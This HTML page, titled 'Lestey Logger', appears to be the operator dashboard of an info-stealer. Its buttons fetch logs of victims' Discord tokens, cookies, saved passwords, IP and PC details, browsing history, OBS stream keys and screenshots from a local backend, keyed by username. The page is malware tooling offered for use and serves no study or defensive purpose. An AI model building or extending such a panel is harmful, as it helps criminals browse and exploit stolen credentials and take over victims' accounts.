<!DOCTYPE html>
<html>

<head>
  <title>Lestey Logger</title>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Alegreya+Sans:ital,wght@1,800&&family=Dongle:wght@300&display=swap');
    body {
      /* background-color: #FFCC00; */
      /* background-image:url('https://www.gtabase.com/igallery/601-700/GTA_V_Artwork_GTAOnline_Lester-683-1600.jpg'); */
      background-image:url('img/LESterback.jpg');
      
      
      background-repeat:no-repeat;
      /* background-size: cover; */
    }


    h1 {
      font-family: sans-serif;
      text-align: center;
      padding-top: 100px;
      font-size: 60px;
      margin: -15px;
      
      
    }

    .maintitle {
      font-family: 'Alegreya Sans', sans-serif;
      color: white;
      font-size: 50px;
      top: -4%;
      position: fixed;
      left: 3%;
      
    
    }

    .maintext {
      font-family: 'Dongle', sans-serif;
      color: wheat;
      font-size: 30px;
      position: fixed;
      top: 10%;
      left: 3%;
      


    }


    img {   
        left: 0;
        position: relative;
        height: 150px;
        width: 150px;
        
    }
    
    .screenshotimg {
      height: 1920px;
      width: 1080px;
    }



    .disbotton {
        /* background-image:url('https://i.imgur.com/LNK3Nph.png');
        background-size: cover;
        background-position: center; */
        height: 150px;
        width: 250px;
        border: none;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        outline: none;
        border-radius: 10px;
        box-shadow: inset 0 0 0 0.09px #000;
        transition: ease-out 0.9s;
        margin-left: 140px;
        margin-top: 50px;
        
        
        
    }


    .disbotton:hover {
        box-shadow: inset 250px 0 0 0.09px #000;
        cursor: pointer;


    }


    .cookiebotton {
 
        height: 150px;
        width: 250px;
        border: none;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        outline: none;
        border-radius: 10px;
        box-shadow: inset 0 0 0 0.09px #000;
        transition: ease-out 0.9s;
        margin-left: 60px;
        margin-top: 50px;
        
        
        
    }


    .cookiebotton:hover {
        box-shadow: inset 250px 0 0 0.09px #000;
        cursor: pointer;


    }

    .passbotton {

        height: 150px;
        width: 250px;
        border: none;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        outline: none;
        border-radius: 10px;
        box-shadow: inset 0 0 0 0.09px #000;
        transition: ease-out 0.9s;
        margin-left: 60px;
        margin-top: 50px;
        
        
        
    }


    .passbotton:hover {
        box-shadow: inset 250px 0 0 0.09px #000;
        cursor: pointer;


    }

    .ipbotton {
        height: 150px;
        width: 250px;
        border: none;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        outline: none;
        border-radius: 10px;
        box-shadow: inset 0 0 0 0.09px #000;
        transition: ease-out 0.9s;
        margin-left: 60px;
        margin-top: 50px;
        
        
        
    }


    .ipbotton:hover {
        box-shadow: inset 250px 0 0 0.09px #000;
        cursor: pointer;


    }


    .pcbotton {
        height: 150px;
        width: 250px;
        border: none;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        outline: none;
        border-radius: 10px;
        box-shadow: inset 0 0 0 0.09px #000;
        transition: ease-out 0.9s;
        margin-left: 140px;
        margin-top: 100px;
        
        
        
    }


    .pcbotton:hover {
        box-shadow: inset 250px 0 0 0.09px #000;
        cursor: pointer;


    }

    .hisbotton {
        height: 150px;
        width: 250px;
        border: none;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        outline: none;
        border-radius: 10px;
        box-shadow: inset 0 0 0 0.09px #000;
        transition: ease-out 0.9s;
        margin-left: 60px;
        margin-top: 100px;
        
        
        
    }


    .hisbotton:hover {
        box-shadow: inset 250px 0 0 0.09px #000;
        cursor: pointer;


    }


    .obsbotton {
        height: 150px;
        width: 250px;
        border: none;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        outline: none;
        border-radius: 10px;
        box-shadow: inset 0 0 0 0.09px #000;
        transition: ease-out 0.9s;
        margin-left: 60px;
        margin-top: 100px;
        
        
        
    }


    .obsbotton:hover {
        box-shadow: inset 250px 0 0 0.09px #000;
        cursor: pointer;


    }

    .imgbotton {
        height: 150px;
        width: 250px;
        border: none;
        background-color: rgb(255, 255, 255);
        border-radius: 10px;
        outline: none;
        border-radius: 10px;
        box-shadow: inset 0 0 0 0.09px #000;
        transition: ease-out 0.9s;
        margin-left: 60px;
        margin-top: 100px;
        
        
        
    }


    .imgbotton:hover {
        box-shadow: inset 250px 0 0 0.09px #000;
        cursor: pointer;


    }


    

    .closebutton {
      position: absolute;
      right: 280px;
      top: 92px;
      width: 32px;
      height: 32px;
      opacity: 0.3;
      z-index: 1;
      border-radius: 5px;
    }
    .closebutton:hover {
      opacity: 1;
    }
    .closebutton:before, .closebutton:after {
      position: absolute;
      left: 12.5px;
      top: -2.3px;
      content: ' ';
      height: 33px;
      width: 3px;
      background-color: #333;
    }
    .closebutton:before {
      transform: rotate(45deg);
    }
    .closebutton:after {
      transform: rotate(-45deg);
    }

    .windwow {
        height: 650px;
        width: 1100px;
        border: none;
        border-radius: 10px;
        position: absolute;
        top: 50%;
        left: 50%;
        margin-right: -50%;
        transform: translate(-50%, -50%);
        background: linear-gradient(-45deg, #EE7752, #E73C7E, #23A6D5, #23D5AB);
        overflow-y: scroll;
    }

    

    

    
  </style>
</head>

<body>
  <h1 id=ipText></h1>


  


  <button type="button" class="disbotton" onclick="showtokens()">
    <img src='img/discord.png' />
  </button>


  <button type="button" class="cookiebotton" onclick="showcookies()">
    <img src='img/cookie.png' />
  </button>

  <button type="button" class="passbotton" onclick="showpcpasswrods()">

    <img src='img/password.png' />
  </button>

  <button type="button" class="ipbotton" onclick="showipinfo()">

    <img src='img/ip.png' />
  </button>

  <button type="button" class="pcbotton" onclick="showpcinfo()">

    <img src='img/pcinfo.png' />
  </button>

  <button type="button" class="hisbotton" onclick="showpchistory()">

    <img src='img/browser-history.png' />
  </button>

  <button type="button" class="obsbotton" onclick="showonskey()">
    <img src='img/OBS-Studio.png' />
  </button>

  <button type="button" class="imgbotton" onclick="showscreenshot()">
    <img src='img/screenshot.png' />
  </button>
  

  <button type="button" id="closebuttonid" class="closebutton" style="display: none;" onclick="xbutton()"></button>

  <div id="mainwindow" class="windwow" style="display: none;">
    <p id='maintitleid' class="maintitle"></p>
    <p id='maintextid' class="maintext"></p>
    <img src="https://i.imgur.com/b0IoyF7.png" alt="Taken at run time" style="display: none;" id="screenshotimgid" class="screenshotimg"/>
  </div>
  
</div>

  
  <script>
    function getPrameter( prameterName ){
      let parameters = new URLSearchParams( window.location.search );
      return parameters.get( prameterName );
    }
  </script>



  <script>
    function showtokens() {
        document.getElementById('mainwindow').style.display = "block";
        document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'Discord Tokens'

        // let xmlHttp = new XMLHttpRequest();
        // xmlHttp.open( "GET", 'http://127.0.0.1:5000/gettoken/', true); // false for synchronous request
        // xmlHttp.send(null);
        
        // console.log(xmlHttp)
        fetch("http://127.0.0.1:5000/returnlogstokesn/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));
        
        }

    function xbutton() {
      document.getElementById('mainwindow').style.display = "none";
      document.getElementById('closebuttonid').style.display = "none";
    }

    function showpcinfo() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'PC In'

        fetch("http://127.0.0.1:5000/returnlogspcinfo/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }

    function showpcinfo() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'PC Info'


        fetch("http://127.0.0.1:5000/returnlogspcinfo/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }


    function showipinfo() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'IP Info'


        fetch("http://127.0.0.1:5000/returnlogsipinfo/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }

    function showonskey() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'OBS Stream Info'

        fetch("http://127.0.0.1:5000/returnlogsobskey/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }

    function showcookies() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'Cookies'

        fetch("http://127.0.0.1:5000/returnlogscookies/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }

    function showpcpasswrods() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'Passwords'


        fetch("http://127.0.0.1:5000/returnlogspasswords/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }


    function showpcpasswrods() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'Passwords'

        fetch("http://127.0.0.1:5000/returnlogspasswords/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }

    function showpchistory() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";


        document.querySelector('#maintitleid').innerHTML = 'History'

  

        fetch("http://127.0.0.1:5000/returnlogshistory/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }

    function showscreenshot() {
      document.getElementById('mainwindow').style.display = "block";
      document.getElementById('closebuttonid').style.display = "block";
      document.querySelector("#maintextid").innerHTML = ''
      document.getElementById('screenshotimgid').style.display="inline";
      
      


        document.querySelector('#maintitleid').innerHTML = 'ScreenShot'

        // let xmlHttp = new XMLHttpRequest();
        // xmlHttp.open( "GET", 'http://127.0.0.1:5000/gettoken/', true); // false for synchronous request
        // xmlHttp.send(null);
        
        // console.log(xmlHttp)
        fetch("http://127.0.0.1:5000/returnlogsscreenshotlink/?username="+ getPrameter('username'))

          .then(response => response.text())
          .then(data => document.querySelector("#maintextid").innerHTML =(data));



    }


  </script>
  

  <!-- <script>
    fetch("https://ipinfo.io/json")
      .then(function (response) {
        return response.json();
      })
      .then(function (myJson) {
        document.querySelector("#mainwindow").innerHTML = myJson.ip;
      })
      .catch(function (error) {
        console.log("Error: " + error);
      });
  </script> -->
  <script type="module" src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.esm.js"></script>
  <script nomodule src="https://unpkg.com/ionicons@5.5.2/dist/ionicons/ionicons.js"></script>
</body>

</html>